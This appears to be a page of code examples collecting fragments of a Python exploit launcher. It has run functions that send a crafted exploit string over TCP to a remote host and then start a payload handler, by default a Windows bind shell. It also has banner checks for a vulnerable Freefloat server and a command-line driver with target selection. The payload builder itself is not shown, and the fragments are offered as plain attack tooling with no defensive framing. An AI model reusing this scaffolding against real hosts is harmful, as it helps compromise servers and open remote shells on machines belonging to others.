Пример #1
0
def run(HOST, PORT, TARGET, PAYLOAD, PARGS):

    SPLOITSTRING = makeSploit(TARGET, PAYLOAD, PARGS)
    SUCCESS = exploitutils.tcpexploit(HOST, PORT, SPLOITSTRING)
    if SUCCESS != True:
        exploitutils.print_bad("Exploit failed!")
        sys.exit()
    sys.stdout.write(" Waiting for exploit to finish")
    sys.stdout.flush()
    time.sleep(1)
    sys.stdout.write(" 4")
    sys.stdout.flush()
    time.sleep(1)
    sys.stdout.write(" 3")
    sys.stdout.flush()
    time.sleep(1)
    sys.stdout.write(" 2")
    sys.stdout.flush()
    time.sleep(1)
    sys.stdout.write(" 1")
    sys.stdout.flush()
    time.sleep(1)
    sys.stdout.write("\r")
    sys.stdout.flush()
    sys.stdout.write("                                      ")
    sys.stdout.write("\r")
    exploitutils.handler(HOST, PAYLOAD)
Пример #2
0
def run(HOST, PORT, TARGET, PAYLOAD, ARGS):

    SPLOITSTRING = makeSploit(TARGET, PAYLOAD, ARGS)
    SUCCESS = exploitutils.tcpexploit(HOST, PORT, SPLOITSTRING)
    if SUCCESS != True:
        exploitutils.print_bad("Exploit failed!")
        sys.exit()
    exploitutils.handler(HOST, PAYLOAD)
Пример #3
0
def checkVulnerability(HOST, PORT):
    # Check banner for Freefloat 1.0
    response = exploitutils.bannercheck(HOST, PORT)

    for BANNER in response:
        exploitutils.print_good("Target appears exploitable")
        return

    exploitutils.print_bad("Target is not vulnerable")
    sys.exit()
Пример #4
0
def main():
    parser = exploitutils.arguments()
    args = parser.parse_args()

    if args.PORT:
        PORT = int(args.PORT)
    else:
        PORT = int(143)

    if args.PAYLOAD:
        PAYLOAD = str(args.PAYLOAD)
    else:
        PAYLOAD = 'win32bind'

    if args.PARGS:
        ARGS = args.PARGS
    else:
        ARGS = ''

    if args.targets:
        print " Exploit targets available:"
        print " ========================="
        for i in TARGETS:
            print " " + str(i) + " | " + TARGETS[i][0]
        sys.exit()

    if args.RHOST:
        HOST = str(args.RHOST)
    else:
        parser.print_help()
        sys.exit()

    if args.check:
        checkVulnerability(HOST, PORT)
        sys.exit()

    if args.TARGET:
        TARGET = TARGETS[int(args.TARGET)][1]
    else:
        exploitutils.print_status("Automatic target selection")
        TARGET = checkVulnerability(HOST, PORT)

    if args.force:
        if not args.TARGET:
            exploitutils.print_bad("Set a target before launching exploit")
            sys.exit()
        run(HOST, PORT, TARGET, PAYLOAD, ARGS)
        sys.exit()

    run(HOST, PORT, TARGET, PAYLOAD, ARGS)
Пример #5
0
def checkVulnerability(HOST, PORT):
    # Check banner
    response = exploitutils.bannercheck(HOST, PORT)

    if response == False:
        exploitutils.print_bad("Exploit failed!")
        sys.exit()
    for i in TARGETS:
        if TARGETS[i][0] in response:
            #print " Received %s" % response
            exploitutils.print_good("Target appears exploitable")
            return TARGETS[i][1]

    exploitutils.print_bad("Target is not vulnerable")
    sys.exit()